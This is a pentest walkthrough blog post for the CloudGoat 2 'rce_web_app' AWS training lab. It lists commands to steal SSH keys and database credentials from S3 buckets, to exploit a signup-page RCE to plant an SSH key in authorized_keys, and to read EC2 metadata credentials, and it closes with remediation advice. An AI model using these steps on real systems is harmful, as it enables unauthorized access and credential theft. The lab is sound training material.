This is the fourth in a series of five posts about Rhino Security Labs’ CloudGoat 2, a “vulnerable by design” AWS deployment tool for learning how to perform pen tests on AWS environments. This particular scenario has the following summary:

Starting as the IAM user Lara, the attacker explores a Load Balancer and S3 bucket for clues to vulnerabilities, leading to an RCE exploit on a vulnerable web app which exposes confidential files and culminates in access to the scenario’s goal: a highly-secured RDS database instance.

Alternatively, the attacker may start as the IAM user McDuck and enumerate S3 buckets, eventually leading to SSH keys which grant direct access to the EC2 server and the database beyond.

The resources that are deployed are:

- 1 VPC with:
  - ELB x 1
  - EC2 x 1
  - S3 x 3
  - RDS x 1
- 2 IAM Users

At first glance, this scenario looks like it marks a change in complexity for the scenarios. For a start, there are two separate IAM users, so presumably we have two separate attack vectors - or perhaps reconnaissance from one user informs an attack vector for the other. Either way, this definitely feels like we’re moving up to a different level.

There are two IAM users - Lara, and McDuck. Clearly, the latter has the cooler name, so we’ll start there.

The Exploit - McDuck

We’ll start in exactly the same way as the other scenarios, by deploying the scenario and then exporting the credentials we find in start.txt for McDuck.

./cloudgoat.py create rce_web_app

export AWS_ACCESS_KEY_ID=AKIA...

export AWS_SECRET_ACCESS_KEY=IXiTd...

We know that the end goal is to find a secret within an RDS database, so let’s start there.

aws rds describe-db-instances --region us-east-1

This command returns the following details about a Postgres database:

{

"DBInstances": [

{

"DBInstanceIdentifier": "cg-rds-instance-cgid2wa7ey2854",

"DBInstanceClass": "db.t2.micro",

"Engine": "postgres",

"DBInstanceStatus": "available",

"MasterUsername": "cgadmin",

"DBName": "cloudgoat",

"Endpoint": {

"Address": "cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com",

"Port": 5432,

"HostedZoneId": "Z2R2ITUGPM61AM"

},

"AllocatedStorage": 20,

"InstanceCreateTime": "2019-06-29T19:06:44.393Z",

"PreferredBackupWindow": "08:35-09:05",

"BackupRetentionPeriod": 0,

"DBSecurityGroups": [],

"VpcSecurityGroups": [

{

"VpcSecurityGroupId": "sg-0f9d725c1a8d6f567",

"Status": "active"

}

],

"DBParameterGroups": [

{

"DBParameterGroupName": "default.postgres9.6",

"ParameterApplyStatus": "in-sync"

}

],

"AvailabilityZone": "us-east-1a",

"DBSubnetGroup": {

"DBSubnetGroupName": "cloud-goat-rds-subnet-group-cgid2wa7ey2854",

"DBSubnetGroupDescription": "CloudGoat cgid2wa7ey2854 Subnet Group",

"VpcId": "vpc-08f9df3db5e887bb6",

"SubnetGroupStatus": "Complete",

"Subnets": [

{

"SubnetIdentifier": "subnet-00378fe169d1b201c",

"SubnetAvailabilityZone": {

"Name": "us-east-1b"

},

"SubnetStatus": "Active"

},

{

"SubnetIdentifier": "subnet-086b7c4789bcf9f1e",

"SubnetAvailabilityZone": {

"Name": "us-east-1a"

},

"SubnetStatus": "Active"

}

]

},

"PreferredMaintenanceWindow": "sun:09:10-sun:09:40",

"PendingModifiedValues": {},

"MultiAZ": false,

"EngineVersion": "9.6.11",

"AutoMinorVersionUpgrade": true,

"ReadReplicaDBInstanceIdentifiers": [],

"LicenseModel": "postgresql-license",

"OptionGroupMemberships": [

{

"OptionGroupName": "default:postgres-9-6",

"Status": "in-sync"

}

],

"PubliclyAccessible": false,

"StorageType": "gp2",

"DbInstancePort": 0,

"StorageEncrypted": false,

"DbiResourceId": "db-E2JAPIGTQ6HUIY2PSGHR7O3AWM",

"CACertificateIdentifier": "rds-ca-2015",

"DomainMemberships": [],

"CopyTagsToSnapshot": false,

"MonitoringInterval": 0,

"DBInstanceArn": "arn:aws:rds:us-east-1:123456789012:db:cg-rds-instance-cgid2wa7ey2854",

"IAMDatabaseAuthenticationEnabled": false,

"PerformanceInsightsEnabled": false,

"DeletionProtection": false,

"AssociatedRoles": []

}

]

}
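Most of that output is noise for our purposes. As a rough sketch (the function name and the trimmed sample are my own, not part of CloudGoat), the handful of fields that matter for connecting later can be pulled out like this:

```python
import json


def summarize_db_instances(describe_output):
    """Pick the connection-relevant fields out of describe-db-instances JSON."""
    data = json.loads(describe_output)
    summaries = []
    for db in data.get("DBInstances", []):
        endpoint = db.get("Endpoint", {})
        summaries.append({
            "identifier": db.get("DBInstanceIdentifier"),
            "engine": db.get("Engine"),
            "host": endpoint.get("Address"),
            "port": endpoint.get("Port"),
            "database": db.get("DBName"),
            "master_user": db.get("MasterUsername"),
            "publicly_accessible": db.get("PubliclyAccessible"),
        })
    return summaries


# Trimmed copy of the output shown above, kept small for illustration.
SAMPLE = """
{
  "DBInstances": [
    {
      "DBInstanceIdentifier": "cg-rds-instance-cgid2wa7ey2854",
      "Engine": "postgres",
      "MasterUsername": "cgadmin",
      "DBName": "cloudgoat",
      "Endpoint": {
        "Address": "cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com",
        "Port": 5432
      },
      "PubliclyAccessible": false
    }
  ]
}
"""

if __name__ == "__main__":
    for summary in summarize_db_instances(SAMPLE):
        print(summary)
```

The key takeaways are the endpoint, the port, the database name, the master username, and the fact that PubliclyAccessible is false, which means we will need a foothold inside the VPC to reach the database.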

I won’t bore you with the details, but I spent the next 10 minutes confirming that McDuck didn’t have any other permissions around RDS, before moving on to explore other options.

We do have some permissions on S3, or at least enough to list the buckets. Running aws s3api list-buckets --query "Buckets[].Name" shows three buckets in the account:

"cg-keystore-s3-bucket-cgid2wa7ey2854",

"cg-logs-s3-bucket-cgid2wa7ey2854",

"cg-secret-s3-bucket-cgid2wa7ey2854",

Attempting to list the contents of cg-secret-s3-bucket and cg-logs-s3-bucket results in getting Access Denied errors, but we get some success with the third bucket.

aws s3 ls s3://cg-keystore-s3-bucket-cgid2wa7ey2854

3381 cloudgoat

742 cloudgoat.pub

We also have permissions to copy the contents of the bucket locally, so using the following two commands gains us a pair of SSH keys.

aws s3 cp s3://cg-keystore-s3-bucket-cgid2wa7ey2854/cloudgoat ./cloudgoat

aws s3 cp s3://cg-keystore-s3-bucket-cgid2wa7ey2854/cloudgoat.pub ./cloudgoat.pub

Personally, I feel like it would be rude not to see what we could use these with, so let’s move straight on to EC2 and see if we have any instances that we might be able to connect to. aws ec2 describe-instances --region us-east-1 confirms that we have a single EC2 instance in the account, with an IAM Instance Role attached and a public IP address. Let’s try and connect to that instance with our shiny new keys.

mv cloudgoat cloudgoat.pem

chmod 400 ./cloudgoat.pem

ssh -i ./cloudgoat.pem ubuntu@ec2-34-227-66-33.compute-1.amazonaws.com

And we’re in!

sudo apt-get install awscli

Now that we’re connected to the instance, we can use the role that’s attached to it, hopefully leveraging its permissions for an attack vector. It turns out that the role doesn’t have any more permissions for RDS than McDuck, but it does have more permissions for S3. cg-secret-s3-bucket-cgid2wa7ey2854 has a file called db.txt, which sounds promising.

aws s3 cp s3://cg-secret-s3-bucket-cgid2wa7ey2854/db.txt ./db.txt

cat ./db.txt

Dear Tomas - For the LAST TIME, here are the database credentials. Save them to your password manager, and delete this file when you’ve done so! This is definitely in breach of our security policies!!!!

DB name: cloudgoat

Username: cgadmin

Password: Purplepwny2029

Sincerely, Lara

Whoops! I don’t think Lara will be overly impressed when this comes to light!



We already have the RDS details from earlier, so let’s try and connect using these credentials, and discover what we have.

psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/cloudgoat
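The connection URI above is just the pieces from db.txt and the earlier RDS output glued together. A minimal sketch of assembling it, assuming a helper name of my own choosing (build_postgres_uri), is below. The percent-encoding doesn't change anything for this particular password, but it would matter if the password contained characters such as @ or /.

```python
from urllib.parse import quote


def build_postgres_uri(user, password, host, port, database):
    """Assemble a postgresql:// URI, percent-encoding the parts that need it."""
    return "postgresql://{}:{}@{}:{}/{}".format(
        quote(user, safe=""),
        quote(password, safe=""),
        host,
        port,
        quote(database, safe=""),
    )


if __name__ == "__main__":
    print(build_postgres_uri(
        "cgadmin",
        "Purplepwny2029",
        "cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com",
        5432,
        "cloudgoat",
    ))
```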

We’re close to completing this scenario now, just one more command -



select * from sensitive_information;

Victory! We now have the value of ‘Super-secret-passcode’.

The Exploit - Lara

There is a second IAM user created for this scenario, so let’s see what attack paths work with Lara. Firstly, we export the credentials to the local environment, then take a look at S3 since that was successful using McDuck’s credentials.

We can list all of the buckets that we could before, so the next step is to see what other permissions we have.

cg-keystore-s3-bucket-cgid2wa7ey2854 and cg-secret-s3-bucket-cgid2wa7ey2854 both return Access Denied errors, but we do have permissions on the third bucket. Running aws s3 ls s3://cg-logs-s3-bucket-cgid2wa7ey2854 --recursive shows the following contents of the bucket:

cg-lb-logs/AWSLogs/123456789012/ELBAccessLogTestFile

cg-lb-logs/AWSLogs/123456789012/elasticloadbalancing/us-east-1/2019/06/19/555555555555_elasticloadbalancing_us-east-1_app.cg-lb-cgidp347lhz47g.d36d4f13b73c2fe7_20190618T2140Z_10.10.10.100_5m9btchz.log

So we have the logs from a load balancer. Let’s download one and see if it shows us anything.

aws s3 cp s3://cg-logs-s3-bucket-cgid2wa7ey2854/cg-lb-logs/AWSLogs/123456789012/elasticloadbalancing/us-east-1/2019/06/19/555555555555_elasticloadbalancing_us-east-1_app.cg-lb-cgidp347lhz47g.d36d4f13b73c2fe7_20190618T2140Z_10.10.10.100_5m9btchz.log ./log.txt




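Reading a load balancer log by eye gets tedious quickly. As a hedged sketch, the distinct requests can be extracted by treating each entry as space-separated fields with double-quoted strings, where the quoted request (method, URL, protocol) is the thirteenth field of an Application Load Balancer entry. The function name and the sample line are made up for illustration and are not taken from the scenario's log.

```python
import csv

# Zero-based position of the quoted "request" field in an ALB access log entry.
REQUEST_FIELD_INDEX = 12


def requested_urls(log_text):
    """Return the sorted, de-duplicated (method, url) pairs found in ALB log text."""
    seen = set()
    reader = csv.reader(log_text.splitlines(), delimiter=" ", quotechar='"')
    for fields in reader:
        if len(fields) <= REQUEST_FIELD_INDEX:
            continue  # blank or truncated line
        parts = fields[REQUEST_FIELD_INDEX].split(" ")
        if len(parts) == 3:
            method, url, _protocol = parts
            seen.add((method, url))
    return sorted(seen)


# Hypothetical, shortened log entry (not copied from the scenario).
SAMPLE_LOG = (
    'http 2019-06-18T21:40:00.000000Z app/example-lb/0123456789abcdef '
    '203.0.113.10:51234 10.10.10.100:9000 0.001 0.002 0.000 200 200 120 340 '
    '"GET http://example-lb.invalid:80/hidden-page.html HTTP/1.1" "curl/7.58.0" - -\n'
)

if __name__ == "__main__":
    for method, url in requested_urls(SAMPLE_LOG):
        print(method, url)
```

Anything that shows up only once or twice, or that isn't linked from the site's home page, is worth a closer look.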

The logs show a GET request to http://cg-lb-cgid2wa7ey2854-1592853733.us-east-1.elb.amazonaws.com/mkja1xijqf0abo1h9glg.html, so let’s take a look at the website and this particular URL.

Seems legit, what about the specific URL we got from the logs?





Let’s see how secure this User Signup page really is:

Turns out, it’s not at all secure, and has a Remote Code Execution vulnerability. I took a look through the files listed by typing cat <filename> into the form, but there was nothing of real interest. Let’s see what other commands we can run.

Running cat /etc/os-release confirms that the website is running on an Ubuntu server:

NAME="Ubuntu"

VERSION="18.04.2 LTS (Bionic Beaver)"

ID=ubuntu

ID_LIKE=debian

PRETTY_NAME="Ubuntu 18.04.2 LTS"

VERSION_ID="18.04"

HOME_URL="https://www.ubuntu.com/"

SUPPORT_URL="https://help.ubuntu.com/"

BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"

PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"

VERSION_CODENAME=bionic

UBUNTU_CODENAME=bionic

Let’s try and write something to the file system - specifically, a new set of SSH keys. We’re going to try and use the following simple one-liner to generate an SSH key without a passphrase in the default location, and then print out the private key.

ssh-keygen -t rsa -C "badman" -f "/home/ubuntu/.ssh/id_rsa" -P ""



cat ~/.ssh/id_rsa

After copying the contents of the private key to a file named badman to use to connect to the instance, the final step is to add the new public key to the authorized_keys file on the EC2 instance.

cat /home/ubuntu/.ssh/id_rsa.pub >> /home/ubuntu/.ssh/authorized_keys

So that should mean…

ssh -i ./badman ubuntu@100.24.40.225

…and we’re in!

In the original CloudGoat, one attack vector was to use data found in the EC2 instance’s User Data, which is served by the instance metadata service. That service is only reachable from the instance itself, but the data is not encrypted at all, so once you have access to the instance there are no further steps to take to read it.

curl http://169.254.169.254/latest/user-data

Not only does the instance have User Data, there are also credentials in there:

#!/bin/bash

apt-get update

curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash -

apt-get install -y nodejs postgresql-client unzip

psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/cloudgoat \

-c "CREATE TABLE sensitive_information (name VARCHAR(50) NOT NULL, value VARCHAR(50) NOT NULL);"

psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/cloudgoat \

-c "INSERT INTO sensitive_information (name,value) VALUES ('Super-secret-passcode',E'V\!C70RY-4hy2809gnbv40h8g4b');"

sleep 15s

cd /home/ubuntu

unzip app.zip -d ./app

cd app

node index.js &

echo -e "\n* * * * * root node /home/ubuntu/app/index.js &\n* * * * * root sleep 10; curl GET http://cg-lb-cgid2wa7ey2854-346930092.us-east-1.elb.amazonaws.com/mkja1xijqf0abo1h9glg.html &\n* * * * * root sleep 10; node /home/ubuntu/app/index.js &\n* * * * * root sleep 20; node /home/ubuntu/app/index.js &\n* * * * * root sleep 30; node /home/ubuntu/app/index.js &\n* * * * * root sleep 40; node /home/ubuntu/app/index.js &\n* * * * * root sleep 50; node /home/ubuntu/app/index.js &\n" >> /etc/crontab

This gives all the information we need to connect to the database, and complete the scenario. Technically, we don’t need to read the data from the table, since the User Data also includes the ‘Super-secret-passcode’. But for completeness we can do the following:

psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/cloudgoat

select * from sensitive_information;
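Credentials embedded in a connection URI, like the ones in the User Data, are easy to search for automatically, whether you are attacking or auditing. The following is a rough sketch with a pattern of my own; it only catches the scheme://user:password@host form and will miss credentials stored in other shapes.

```python
import re

# Matches scheme://user:password@host and captures each part.
CREDENTIAL_URI = re.compile(
    r"(?P<scheme>[a-z][a-z0-9+.-]*)://"
    r"(?P<user>[^:/\s@]+):(?P<password>[^@/\s]+)@"
    r"(?P<host>[^:/\s]+)"
)


def find_embedded_credentials(text):
    """Return sorted, de-duplicated (scheme, user, password, host) tuples."""
    found = set()
    for match in CREDENTIAL_URI.finditer(text):
        found.add((
            match.group("scheme"),
            match.group("user"),
            match.group("password"),
            match.group("host"),
        ))
    return sorted(found)


# A few lines lifted from the User Data shown earlier.
SAMPLE_USER_DATA = """#!/bin/bash
curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash -
psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/cloudgoat \\
-c "CREATE TABLE sensitive_information (name VARCHAR(50) NOT NULL, value VARCHAR(50) NOT NULL);"
"""

if __name__ == "__main__":
    for hit in find_embedded_credentials(SAMPLE_USER_DATA):
        print(hit)
```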

There’s another way that we could get access to the password, if the developers had steered clear of putting the passwords in plain text in the User Data of the instance. It’s essentially the same route that we took with McDuck, getting the details from db.txt in one of the S3 buckets.

sudo apt-get install awscli

aws s3 ls

aws s3 ls s3://cg-secret-s3-bucket-cgid2wa7ey2854 --recursive

aws s3 cp s3://cg-secret-s3-bucket-cgid2wa7ey2854/db.txt .

cat db.txt

aws rds describe-db-instances --region us-east-1

psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgid2wa7ey2854.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/cloudgoat

\dt

select * from sensitive_information;

Summary and Remediation

In this example, the Remote Code Execution works because user input from the form is blindly executed by the application. As best practice, you should avoid functions where user input is evaluated, and this is well documented. I won’t go any further into this though, since it’s not specific to AWS.
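For a flavour of what the safer pattern looks like, here is a small Python sketch. It is an analogue only: the scenario's app is a Node.js application and this is not its code, and the allow-list pattern and function names are assumptions of mine. The two ideas are to validate input against a strict allow-list, and to pass it to any external program as a discrete argument rather than through a shell.

```python
import re
import subprocess
import sys

# Allow-list: letters, digits, underscore, dot and hyphen, 1 to 32 characters.
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(value):
    """Accept only values made up entirely of allow-listed characters."""
    return USERNAME_PATTERN.fullmatch(value) is not None


def greet_user(username):
    """Hand validated input to a child process as an argument, never via a shell."""
    if not is_valid_username(username):
        raise ValueError("rejected input")
    result = subprocess.run(
        # An argument list with no shell=True: the input is never parsed as a command.
        [sys.executable, "-c", "import sys; print('hello ' + sys.argv[1])", username],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()


if __name__ == "__main__":
    print(greet_user("lara"))
    print(is_valid_username("lara; cat /etc/passwd"))
```

With this approach, a payload such as lara; cat /etc/passwd is rejected before it gets anywhere near a process boundary.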

Another thing that’s not AWS specific is that Lara’s note is 100% correct - passwords shouldn’t be stored in text files! There are some great password managers out there, so if you’re not using one already go ahead and treat yourself!

Amazon EC2 Instance Connect, recently announced around re:Inforce, allows you to generate one-time use SSH keys each time an authorised user connects. This removes any need to store keys anywhere, and should be a serious consideration when looking at or reviewing your security posture.

In terms of access keys, these should be audited regularly as well as rotated regularly - at least if keys are compromised, there is a limited amount of time that they are useful to an attacker (and if you’re lucky, they will have expired before they are compromised).
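An audit like this can be as simple as flagging active keys older than a chosen threshold. The sketch below assumes key metadata shaped like the entries returned when listing a user's access keys (AccessKeyId, Status, CreateDate), with CreateDate already parsed into a timezone-aware datetime. The 90-day threshold and the key IDs are illustrative choices of mine, not recommendations from the scenario.

```python
from datetime import datetime, timedelta, timezone


def stale_access_keys(keys, max_age_days=90, now=None):
    """Return the IDs of active keys created more than max_age_days ago."""
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=max_age_days)
    return [
        key["AccessKeyId"]
        for key in keys
        if key["Status"] == "Active" and key["CreateDate"] < cutoff
    ]


# Hypothetical key metadata for illustration.
EXAMPLE_KEYS = [
    {"AccessKeyId": "AKIAOLDEXAMPLE", "Status": "Active",
     "CreateDate": datetime(2019, 1, 1, tzinfo=timezone.utc)},
    {"AccessKeyId": "AKIANEWEXAMPLE", "Status": "Active",
     "CreateDate": datetime(2019, 6, 15, tzinfo=timezone.utc)},
    {"AccessKeyId": "AKIAOFFEXAMPLE", "Status": "Inactive",
     "CreateDate": datetime(2018, 1, 1, tzinfo=timezone.utc)},
]

if __name__ == "__main__":
    as_of = datetime(2019, 7, 1, tzinfo=timezone.utc)
    print(stale_access_keys(EXAMPLE_KEYS, now=as_of))
```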

As well as enforcing MFA, you should also consider using IAM policies to restrict IP ranges that API calls can originate from, as well as times of day where appropriate. Be careful not to lock out your on-call people though by assigning their user accounts an IAM policy that specifies office hours. Also, don’t solve that problem by having a generic set of keys that all on-call engineers use that’s stored in a text file!
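As an illustration of the IP restriction, here is a sketch that builds a deny-by-default policy document using the aws:SourceIp condition key. The CIDR range is a documentation placeholder and the function name is mine. The aws:ViaAWSService condition is included so that calls AWS services make on the user's behalf are not blocked. Treat this as a starting point to test in a sandbox account, not a drop-in policy.

```python
import json


def deny_outside_network_policy(allowed_cidrs):
    """Build an IAM policy that denies API calls from outside the given CIDR ranges."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "DenyOutsideAllowedNetworks",
                "Effect": "Deny",
                "Action": "*",
                "Resource": "*",
                "Condition": {
                    # Deny when the caller's IP is NOT in the allowed ranges...
                    "NotIpAddress": {"aws:SourceIp": list(allowed_cidrs)},
                    # ...unless the call is made by an AWS service on the user's behalf.
                    "Bool": {"aws:ViaAWSService": "false"},
                },
            }
        ],
    }


if __name__ == "__main__":
    # 203.0.113.0/24 is a placeholder range reserved for documentation.
    print(json.dumps(deny_outside_network_policy(["203.0.113.0/24"]), indent=2))
```

Because this is an explicit deny, it needs to be paired with separate allow policies that grant the permissions the user actually needs.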

Finally, let’s talk about log management. Logs can often be seen as unimportant, and only needed when you’re trying to troubleshoot an issue. The truth is that they often contain sensitive and other information that’s interesting to potential attackers. You should ideally set up a separate AWS account that you forward all of your logs to, and ensure that access to that account is tightly controlled. Provide the relevant services write access to put their logs into the S3 buckets, and a controlled number of people (such as a security team) read access to them - because no-one should have write access to logs.